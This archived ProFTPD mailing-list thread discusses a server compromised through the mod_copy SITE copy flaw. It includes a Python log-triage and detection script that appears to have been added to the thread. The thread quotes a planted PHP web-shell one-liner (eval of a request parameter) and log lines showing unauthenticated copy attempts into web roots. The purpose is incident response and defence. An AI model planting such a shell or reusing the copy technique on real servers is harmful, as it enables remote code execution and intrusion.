[Proftpd-user] proftpd 1.3.5 vulnerable?
Tomasz Chmielewski
2016-04-07 15:54:21 UTC
Running proftpd on Ubuntu 14.04.4 LTS with the latest updates installed
as of today.

proftpd-basic 1.3.5~rc3-2.1ubuntu2
amd64


Found a weird file:

# ls -la /tmp|grep eval
-rw-r--r-- 1 proftpd nogroup 85 Apr 7 14:21 .<?php eval($_REQUEST[cmd]); echo GOOD;?>

# cat /tmp/.*eval*
proftpd: 80.110.39.36:56405: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD;?>


There are no anonymous users, there is no trace in the logs about any
valid user logging in around 14:21, Apr 7.

Except these:

2016-04-07 14:19:52,570 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): FTP session opened.
2016-04-07 14:19:52,997 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/html/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,428 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/html/images/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,820 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/html/img/infos.php' for copying: No such file or directory
2016-04-07 14:19:54,302 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/www/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:54,882 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/www/images/infos.php' for copying: No such file or directory
2016-04-07 14:19:55,403 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/www/img/infos.php' for copying: No such file or directory
(...)
2016-04-07 14:21:59,207 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): FTP session closed.


And the list goes on. It only logs about the files it didn't find; it
doesn't log about the files it did find or uploaded - apparently the
attacker had access to the whole server as "proftpd" user.


Is it a known problem? For now, switched off proftpd.


Tomasz Chmielewski
http://wpkg.org
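The log excerpt above is enough to triage on: mod_copy only leaves a trace in the SystemLog when the destination of a SITE copy cannot be opened, and the copies here happen in a session with no login. The script below is an added example for this thread, not code from the poster or from the ProFTPD project. It groups SystemLog lines into sessions by child pid and client address, reports sessions that produced copy errors without a successful login, and lists directory entries whose names carry PHP code (like the entry found in /tmp). The sample lines are constructed from the format shown in the post with a second, benign session added; the wording "USER <name>: Login successful." for an authenticated login is an assumption about ProFTPD's SystemLog message.

```python
"""Triage helper for the ProFTPD SystemLog pattern seen in the post:
SITE copy failures ("error opening destination file ... for copying")
in sessions that never authenticated."""
import re
from collections import OrderedDict

# Constructed sample modelled on the lines in the post (abbreviated), plus a
# benign authenticated session.  The "USER <name>: Login successful." line is
# an assumption about ProFTPD's SystemLog wording for a successful login.
SAMPLE_LOG = """\
2016-04-07 14:19:52,570 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): FTP session opened.
2016-04-07 14:19:52,997 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/html/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,428 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/www/images/infos.php' for copying: No such file or directory
2016-04-07 14:21:59,207 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): FTP session closed.
2016-04-07 15:02:10,001 server proftpd[7301] 10.11.12.13 (198.51.100.7[198.51.100.7]): FTP session opened.
2016-04-07 15:02:11,120 server proftpd[7301] 10.11.12.13 (198.51.100.7[198.51.100.7]): USER alice: Login successful.
2016-04-07 15:02:15,300 server proftpd[7301] 10.11.12.13 (198.51.100.7[198.51.100.7]): error opening destination file '/home/alice/bak/site.php' for copying: No such file or directory
2016-04-07 15:03:00,000 server proftpd[7301] 10.11.12.13 (198.51.100.7[198.51.100.7]): FTP session closed.
"""

# "<timestamp> <host> proftpd[<pid>] <server ip> (<client host>[<client ip>]): <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) \S+ proftpd\[(?P<pid>\d+)\] "
    r"\S+ \((?P<host>[^\[]*)\[(?P<ip>[^\]]+)\]\): (?P<msg>.*)$"
)
COPY_ERR_RE = re.compile(r"^error opening destination file '(?P<dst>.+)' for copying: (?P<err>.*)$")
LOGIN_RE = re.compile(r"^USER (?P<user>\S+): Login successful\.$")  # assumed wording


def parse_sessions(log_text):
    """Group SystemLog lines into sessions keyed by (pid, client ip).

    Each ProFTPD connection is served by its own child process, so the pid
    together with the client address identifies one FTP session."""
    sessions = OrderedDict()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated or truncated line
        key = (m["pid"], m["ip"])
        s = sessions.setdefault(key, {"pid": m["pid"], "ip": m["ip"], "opened": None,
                                      "closed": None, "user": None, "targets": []})
        msg = m["msg"]
        login = LOGIN_RE.match(msg)
        copy_err = COPY_ERR_RE.match(msg)
        if msg == "FTP session opened.":
            s["opened"] = m["ts"]
        elif msg == "FTP session closed.":
            s["closed"] = m["ts"]
        elif login:
            s["user"] = login["user"]
        elif copy_err:
            s["targets"].append(copy_err["dst"])
    return sessions


def suspicious_sessions(log_text):
    """Sessions that attempted SITE copies but never logged in.

    Only failed copies show up in the SystemLog (successful ones are silent,
    as the post notes), so the target list is a lower bound on what was tried."""
    out = []
    for s in parse_sessions(log_text).values():
        if s["targets"] and s["user"] is None:
            out.append({**s, "copy_attempts": len(s["targets"])})
    return out


PHP_TAG_RE = re.compile(r"<\?php|<\?=|\beval\s*\(", re.IGNORECASE)


def php_tagged_names(names):
    """Directory entries whose *name* contains a PHP open tag or eval(.

    No legitimate file is named that way; the /tmp entry in the post is the
    kind of artifact this catches."""
    return [n for n in names if PHP_TAG_RE.search(n)]


if __name__ == "__main__":
    for s in suspicious_sessions(SAMPLE_LOG):
        print(f"{s['ip']} pid {s['pid']} {s['opened']} .. {s['closed']}: "
              f"{s['copy_attempts']} copy attempt(s), no login")
        for t in s["targets"]:
            print("   ->", t)
    # Constructed /tmp listing containing the name from the post.
    print(php_tagged_names([".bash_history", ".<?php eval($_REQUEST[cmd]); echo GOOD;?>"]))
```

Run it against the real SystemLog (or the proftpd lines from syslog) instead of SAMPLE_LOG. The destination paths of the failed copies tell you which web roots were probed; the copies that succeeded leave no SystemLog entry, so the web roots that do exist have to be checked on disk for new .php files. To see the SITE CPFR/CPTO commands themselves on a running server, record commands with an ExtendedLog whose LogFormat includes %r.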
TJ Saunders
2016-04-07 16:17:49 UTC
Post by Tomasz Chmielewski
> Running proftpd on Ubuntu 14.04.4 LTS with the latest updates installed
> as of today.
> proftpd-basic 1.3.5~rc3-2.1ubuntu2
> amd64
> # ls -la /tmp|grep eval
> -rw-r--r-- 1 proftpd nogroup 85 Apr 7 14:21 .<?php eval($_REQUEST[cmd]); echo GOOD;?>
> # cat /tmp/.*eval*
> proftpd: 80.110.39.36:56405: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD;?>
> There are no anonymous users, there is no trace in the logs about any
> valid user logging in around 14:21, Apr 7.
> 2016-04-07 14:19:52,570 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): FTP session opened.
> 2016-04-07 14:19:52,997 server proftpd[7263] 10.11.12.13 (80.110.39.36[80.110.39.36]): error opening destination file '/var/html/image/infos.php' for copying: No such file or directory
This sounds suspiciously like:

http://bugs.proftpd.org/show_bug.cgi?id=4169

If you can, I'd recommend upgrading to a later version of proftpd
(1.3.5-stable or later), and disabling/removing/not loading the mod_copy
module.

TJ
Tomasz Chmielewski
2016-04-07 16:20:42 UTC
Post by TJ Saunders
> http://bugs.proftpd.org/show_bug.cgi?id=4169
> If you can, I'd recommend upgrading to a later version of proftpd
> (1.3.5-stable or later), and disabling/removing/not loading the mod_copy
> module.
Indeed.

Nobody in Ubuntu cared to update it for so long!

https://bugs.launchpad.net/ubuntu/%2Bsource/proftpd-dfsg/%2Bbug/1462311


Tomasz Chmielewski
http://wpkg.org
